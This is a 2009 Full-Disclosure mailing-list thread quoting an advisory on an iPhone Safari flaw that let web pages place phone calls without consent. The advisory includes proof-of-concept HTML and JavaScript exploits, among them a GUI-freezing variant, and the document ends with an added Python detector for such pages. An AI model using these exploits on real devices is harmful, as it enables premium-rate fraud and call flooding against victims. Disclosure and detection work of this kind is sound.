Re: [Full-disclosure] iPhone Safari phone-auto-dial vulnerability (original date: Nov. 2008)
- To: Collin Mulliner <collin@xxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] iPhone Safari phone-auto-dial vulnerability (original date: Nov. 2008)
- From: James Matthews <nytrokiss@xxxxxxxxx>
- Date: Fri, 19 Jun 2009 00:57:32 +0300
Bug or feature (an old, common argument within the software world); however, I
don't think that automatic dialing is what I want when I am browsing a page.
I would like a choice, not for it to be done automatically.
On Thu, Jun 18, 2009 at 8:29 PM, Collin Mulliner <collin@xxxxxxxxxxxxxxx> wrote:
> Mike,
>
> just getting to the phone dialer is not a bug! That is what the tel:
> protocol is for. Almost all mobile phones implement this; every time
> you open a tel: URL you will get to the dialer in some way.
>
> Collin
>
> Mike Ely wrote:
> > Confirmed on the T-Mobile G1 email app running OS version 1.5. Was
> > wondering why my phone stepped on email to dial out when I read this email
> > and then I read the subject line ;)
> >
> > FWIW, it didn't actually dial, just loaded the dialer with that number
> > ready.
> >
> > Looks like this is a Webkit bug, not Safari.
> >
> > Collin Mulliner <collin@xxxxxxxxxxxxxxx> wrote:
> >
> >> Released since Apple published the iPhone 3.0 security fixes.
> >>
> >> Vulnerability Report
> >>
> >> --- BEGIN ADVISORY ---
> >>
> >> Manufacturer: Apple (www.apple.com)
> >> Device: iPhone 3G (iPhone 1st Gen)
> >> Firmware: 2.1 (possible earlier versions)
> >> Device Type: smart phone
> >>
> >> Subsystems: Safari (and mobile telephony)
> >>
> >> -----------------------------
> >>
> >> Short name:
> >> iPhone Safari phone-auto-dial (vulnerability)
> >>
> >> Vulnerability class:
> >> application logic bug
> >>
> >> Executive Summary:
> >> A malicious website can initiate a phone call without the need of user
> >> interaction. The destination phone number is chosen by the attacker.
> >>
> >> Risk: MEDIUM-HIGH
> >> Medium to high risk due to the possibility of financial gain through
> >> this attack by calling of premium rate numbers (e.g. 1-900 in the
> >> U.S.). Denial-of-service against arbitrary phone numbers through
> >> mass-calling. User cannot prevent attack.
> >>
> >> -----------------------------
> >>
> >> Reporter: Collin Mulliner <collin[AT]mulliner.org>
> >>
> >> -----------------------------
> >>
> >> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
> >>
> >> -----------------------------
> >>
> >> Time line:
> >>
> >> Oct. 20. 2008: Reported vulnerability to vendor.
> >> Oct. 20. 2008: Vendor acknowledges receiving our email.
> >> Not commenting on the vulnerability itself.
> >> Oct. 27. 2008: Sent update to vendor, also requesting a status report.
> >> Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
> >> Oct. 30. 2008: Sent additional information.
> >> Nov. 13. 2008: Vendor says vulnerability is fixed in upcoming OS
> >> version.
> >> Nov. 20. 2008: Public disclosure.
> >> Jun. 18. 2009: Full-Disclosure.
> >>
> >> -----------------------------
> >>
> >> Fix:
> >>
> >> iPhone OS 2.2
> >> iPhone OS 2.2.1
> >> iPhone OS 3.0
> >>
> >> -----------------------------
> >>
> >> Technical Details:
> >>
> >> The Safari version running on the iPhone supports handling the TEL [1]
> >> protocol through launching the telephony/dialer application. This is
> >> done by passing the provided phone number to the telephony
> >> application. Under normal conditions, loading a tel: URI results in a
> >> message box asking the user's permission to call the given number. The
> >> user is presented with the simple choice to either press call or
> >> cancel.
> >>
> >> A TEL URI can be opened automatically if the TEL URI is used as the
> >> source of an HTML iframe or frame, as the URL of a meta refresh, as
> >> the location of an HTTP 30X redirect, and as the location of the
> >> current or a new window using javascript.
> >>
> >> We discovered a security vulnerability that dismisses the "ask for
> >> permission to call" dialog in a way that chooses the "call" option
> >> rather than the "cancel" option.
> >>
> >> This condition occurs if a TEL URI is activated at the same time
> >> Safari is closed by launching an external application, for example
> >> launching the SMS application (in order to handle an SMS URI [2]). The
> >> SMS application can be launched through placing an SMS URI as the
> >> source of an iframe. This is shown in the first proof-of-concept
> >> exploit below.
> >>
> >> Further investigation showed that this behavior can be reproduced by
> >> launching other applications such as: Maps, YouTube, and iTunes.
> >> Launching these applications can be achieved through loading special
> >> URLs using the meta refresh tag. This is shown in the second
> >> proof-of-concept exploit below.
> >>
> >> We also discovered that the bug can also be triggered through popup
> >> windows (e.g. javascript alert). In this situation the initiating app
> >> does not need to be terminated in order to activate the call.
> >>
> >> Finally, we discovered a second bug that can be used to perform
> >> malicious phone calls that cannot be prevented or canceled by the
> >> victim. This bug allows the attacker to freeze the GUI (graphical user
> >> interface) for a number of seconds. While the GUI is frozen the call
> >> progresses in the background and cannot be stopped by the victim
> >> user.
> >> Freezing the GUI is achieved by passing a "very long" phone number to
> >> the SMS application. The SMS application, immediately after being
> >> started, freezes the iPhone GUI. Also, switching off the iPhone cannot
> >> be performed fast enough in order to prevent the malicious call.
> >>
> >>
> >> [1] http://www.rfc-editor.org/rfc/rfc3966.txt
> >> [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
> >>
> >> -----------------------------
> >>
> >> Further Discussion:
> >>
> >> The dialing dialog is clearly shown to the user, but the user, in most
> >> cases, can't press cancel quickly enough in order to stop the initiation
> >> of the call. Once the external application is launched, the telephony
> >> application is running in the background performing the call. Only
> >> the call forwarding dialog (containing the "dismiss" button) indicates
> >> a call being made.
> >>
> >> -----------------------------
> >>
> >> Proof-of-Concept with plain HTML using the SMS application:
> >>
> >> <html>
> >> <head>
> >> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> >> </title>
> >> </head>
> >> <body>
> >> <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> >> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> >> <!-- second iframe is to attack quick users who manage to close the
> >> first call-dialog //-->
> >> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> >> </body>
> >> </html>
> >>
> >> Proof-of-Concept using javascript and the Maps application:
> >>
> >> <html>
> >> <head>
> >> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> >> </title>
> >> <meta http-equiv="refresh" content="0; URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
> >> </head>
> >> <body>
> >> <script lang=javascript>
> >> function a() {
> >> document.write("<iframe src=\"tel:+14089748388\" WIDTH=50 HEIGHT=10></iframe>");
> >> }
> >> setTimeout("a()", 100);
> >> </script>
> >> </body>
> >> </html>
> >>
> >> Proof-of-Concept attack where the victim user cannot stop the malicious
> >> phone call:
> >>
> >> <html>
> >> <head>
> >> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> >> </title>
> >> </head>
> >> <body>
> >> <script lang=javascript>
> >> l = "<iframe src=\"sms:";
> >> for (i = 0; i < 10000; i++) {
> >> l = l + "3340948034298232";
> >> }
> >> l = l + "\" width=10 height=10></iframe><iframe src=\"tel:+14089748388\" height=10 width=10></iframe>";
> >> document.write(l);
> >> </script>
> >> </body>
> >> </html>
> >>
> >> -----------------------------
> >>
> >> More Detailed Information:
> >>
> >> Demo video available at:
> >> http://www.mulliner.org/iphone/
> >>
> >> Advisories:
> >> http://www.mulliner.org/security/advisories/
> >>
> >> --- END ADVISORY ---
> >>
> >>
> >> --
> >> Collin R. Mulliner <collin@xxxxxxxxxxxxxxx>
> >> info/pgp: finger collin@xxxxxxxxxxxxxxx
> >> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he
> >> does!
>
>
> --
> Collin R. Mulliner <collin@xxxxxxxxxxxxxxx>
> info/pgp: finger collin@xxxxxxxxxxxxxxx
> C gives you enough rope to hang yourself. C++ also gives you the tree
> object to tie it to.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
http://www.goldwatches.com
http://www.jewelerslounge.com
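As an added defensive example (not part of the advisory or of this thread): a content check, written here in Python, that flags the automatic tel:/sms: load paths the advisory enumerates (iframe/frame src, a meta refresh target, inline script that writes such a URI) so a web proxy or mail gateway can log or block the page before a device sees it. The regular expressions, the SAMPLE markup and the phone number are constructed for this example.

```python
import re
from html.parser import HTMLParser

PHONE = ("tel:", "sms:")  # schemes handed to the dialer / SMS app (RFC 3966 tel:, sms: draft)
# Inline-script shapes from the advisory: an iframe src written by document.write, or a
# location / window.open set to a tel:/sms: URI. A heuristic, not a JavaScript parser.
SCRIPT_RE = re.compile(r"""(?:src\s*=\s*\\?["']|location(?:\.href)?\s*=\s*["']|"""
                       r"""window\.open\(\s*["'])\s*((?:tel|sms):[^"'\\]*)""", re.I)
META_URL_RE = re.compile(r"""url\s*=\s*["']?([^"'\s;]+)""", re.I)

class AutoDialDetector(HTMLParser):
    """Collects tel:/sms: loads that need no tap: iframe/frame src, meta refresh, inline script."""
    def __init__(self):
        super().__init__()
        self.findings, self._in_script = [], False

    def _check(self, where, value):
        if value and value.strip().lower().startswith(PHONE):
            self.findings.append((where, value.strip()))

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("iframe", "frame"):
            self._check(tag, a.get("src"))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_URL_RE.search(a.get("content") or "")
            self._check("meta-refresh", m.group(1) if m else None)
        self._in_script = self._in_script or tag == "script"

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        if self._in_script:  # HTMLParser delivers <script> bodies here as raw text
            for m in SCRIPT_RE.finditer(data):
                self._check("script", m.group(1))

def find_auto_dial(html):
    """Return [(where, uri), ...] for every automatic tel:/sms: load in the page."""
    p = AutoDialDetector()
    p.feed(html)
    return p.findings

# Constructed sample in the shape of the advisory's first two PoCs (placeholder number).
SAMPLE = """<html><head><meta http-equiv="refresh" content="0; URL=http://maps.example.invalid/">
</head><body><a href="tel:+15555550100">call us</a>
<iframe src="sms:+15555550100" WIDTH=50 HEIGHT=10></iframe>
<iframe src="tel:+15555550100" WIDTH=50 HEIGHT=10></iframe>
<script>document.write("<iframe src=\\"tel:+15555550100\\" WIDTH=50></iframe>");</script>
</body></html>"""
```

A plain `<a href="tel:...">` is deliberately not flagged: it needs a tap and goes through the call/cancel dialog the advisory describes. The HTTP 30X redirect path is the same two-scheme test applied to the response's Location header.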